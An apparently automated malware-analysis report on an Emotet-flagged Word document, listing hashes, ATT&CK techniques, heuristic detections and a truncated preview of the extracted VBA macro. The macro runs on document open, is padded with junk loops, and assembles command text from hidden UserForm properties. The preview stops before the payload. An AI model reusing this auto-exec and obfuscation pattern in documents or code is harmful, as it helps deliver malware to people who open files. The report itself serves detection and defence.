Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 d3a971e91f47c541…

MALICIOUS

Office (OLE)

Size: 196.5 KB
Created: 2019-12-16 11:52:00
Authoring application: Microsoft Office Word
First seen: 2020-09-24
MD5: 3e41a800ec6a0fc6cebdab5f3db9ee12
SHA-1: 89859ef8b0cd9bac82dde95e1cc89076b9a8bf25
SHA-256: d3a971e91f47c541df76801e52a72840032f85e684147587c26417c906644908
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1566.001 Phishing: Spearphishing Attachment
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic

The sample carries a VBA macro that runs as soon as the document is opened: the ThisDocument module (VB_Name "Bitxhrjgp") defines Document_open, and the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic finds the matching auto-exec token together with shell/object-execution tokens in the compiled p-code stream, so the behaviour is present even if source extraction were to fail. The macro has the shape of a hidden command stager: the extracted source is padded with no-op For/Next loops and junk arithmetic, while the few statements that matter concatenate a UserForm TextBox (Bitxhrjgp.Nvfplifobfo, declared by the VB_Control attribute) with properties of a second form module (Noxbrghspp.*). The command text therefore lives in form properties rather than in the VBA source, and the heuristics report it being handed to CreateObject/GetObject (the call itself falls past the truncated preview). ClamAV's Doc.Downloader.Emotet-7458561-0 signature matches a known Emotet downloader variant.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7458561-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458561-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro: the macro runs automatically when the document is opened
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call: the macro instantiates a COM object by ProgID
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call: the macro obtains a COM object from a moniker string
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that any document containing drawing objects carries; it is not a download or C2 location and should not be treated as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  8121 bytes
SHA-256: 0cd7ccc0fc161a39607d71ebbceefad3644e60dbcd6be62f45af1aeac86c6fd5

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "Bitxhrjgp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Nvfplifobfo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Ggvyuqilog
      Dim Rjzpngdwx
      For Adoevnutxqrg = Wsdafmwkc To 0
         Keaoexfvf = xPI
         Ywmnbtnrn = CDbl(3)
         Gmmxunopzdbg = Tan(MyeW5A)
         Dissmfxs = 4 - Rifvxdpjnqynb
         Sgqvcwpj = (3 - Luzbqxnopfmht)
         Ostmdpglpuygx = Cytwmiqi
         Lzlbplnyznev = CDbl(6)
         Jejjgrqpso = Tan(Nwfnyjwtspv)
      Next
      Dim Lllknmteqqpn
      Dim Xmuesxtmslj
      For Spwoynaiop = Wsdafmwkc To 0
         Layfolbpsyk = xPI
         Qnaysabzbb = CDbl(3)
         Braghjxhngxu = Tan(MyeW5A)
         Ahystftg = 4 - Ajvplrkyjlnta
         Pnvvkqgrnz = (3 - Iijbvkag)
         Hvwvzkvrhgq = Rxkwjtrh
         Qbpzjsizbmbf = CDbl(6)
         Oqvvwsmjaesdk = Tan(Mgfsdfujkmyy)
      Next
      Dim Grgtpuhf
      Dim Obyhsxlwobgh
      For Atfgcxmbgig = Wsdafmwkc To 0
         Tgpuueyuywta = xPI
         Evgxzdrswo = CDbl(3)
         Hemuqbge = Tan(MyeW5A)
         Ygmdpubxmfa = 4 - Gzkhicaka
         Wtidfstwrnw = (3 - Vnwrzcuctw)
         Guxbsgxmvgwm = Umdwukazlvg
         Yzodwcizxw = CDbl(6)
         Hymqpqjthhiyw = Tan(Uhjcvivyngdzk)
      Next
Wnzvxsqak
End Sub

Attribute VB_Name = "Noxbrghspp"
Attribute VB_Base = "0{8D8AB0EE-BCBE-4569-9D91-ACBA2ABA6288}{11439809-AED8-417B-8B3C-336D335BD734}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Iyejcapn"
Function Ialmizozauxqh()
      Dim Somucqcw
      Dim Mzszclbggbzr
      For Jufgbijjtmhva = Wsdafmwkc To 0
         Vdatotvnuz = xPI
         Rmrbaynkhkwuy = CDbl(3)
         Ggsgkxwk = Tan(MyeW5A)
         Ybfnglhsiswck = 4 - Nsbkgfugpphcs
         Ubtccwhx = (3 - Pcpqgevljxevz)
         Dvpxziougxvi = Afvalrdf
         Llqjaxzccj = CDbl(6)
         Rzbqaiis = Tan(Oiiriuozpyfg)
      Next
Fwewzziysa = Bitxhrjgp.Nvfplifobfo
      Dim Jttzzpbr
      Dim Qffanlmbhzd
      For Mofdeuigncrkm = Wsdafmwkc To 0
         Dmbrnhfaq = xPI
         Qvcjgzyuhkul = CDbl(3)
         Ohccopabhxuxl = Tan(MyeW5A)
         Goozmeneevr = 4 - Cujbftyzdxc
         Onepjnadavf = (3 - Tbdygwejzm)
         Sszrdrmmvpzz = Eknczepvax
         Qfjhpbrvq = CDbl(6)
         Mwetzodb = Tan(Tstvwmjdxs)
      Next
Xuozuvkm = Fwewzziysa + Noxbrghspp.Jxzubcxrxu + Noxbrghspp.Gsyrwbuclsok + Noxbrghspp.Ydntosjwwp
      Dim Qcwifcgsn
      Dim Ulwwtvpu
      For Jiabtjdnhweof = Wsdafmwkc To 0
         Mrvazsxlq = xPI
         Kvzzqebgh = CDbl(3)
         Glscefzvffkrg = Tan(MyeW5A)
         Tdhlxkylzhoi = 4 - Nzekqlji
         Sluxcaetvwk = (3 - Vwlhatupxuvrg)
         Psklgtsmp = Zdvmjppaio
         Jpcyvryf = CDbl(6)
         Xeclzsfcjwgr = Tan(Ukkgcfwskpb)
      Next
Zwkyadvwkg = Xuozuvkm + Noxbrghspp.Txzwzvgnylw + Noxbrghspp.Ygdcwgum
      Dim Ajtbzfgrttacu
      Dim Agtiijgeyeub
      For Xhvvtrduxsraj = Wsdafmwkc To 0
         Njoqhqxs = xPI
         Qteuwedpvvmeh = CDbl(3)
         Pfiariac = Tan(MyeW5A)
         Vgkjgzoqxd = 4 - Zbnnkoiqibnpr
         Ropprcjbytf = (3 - Xojxerfhmdxmu)
         Tsvrvlxb = Gvqzptezmst
         Lafgfkrdwrg = CDbl(6)
         Yoskambkx = Tan(Hxjsmisjbck)
      Next
Ialmizozauxqh = Gnnsnrmty + Zwkyadvwkg + Gnnsnrmty
      Dim Iunyjhyvwf
      Dim Bbygtfrmsf
      For Hcmpqervb = Wsdafmwkc To 0
         Qcskogroaplcs = xPI
         Mzizrdmgq = CDbl(3)
         Ifsovhkfidav = Tan(MyeW5A)
         Bqgqvatel = 4 - Nczsdvbdtxmw
         Drndbmefspnf = (3 - Haetbwiflnfi)
         Jjpuuxsigake = Jjfxfgvss
         Pkxfzysnlvjz = CDbl(6)
         Tcyuejwiaw = Tan(Hdrwrqxze)
      Next
End Func
... (truncated)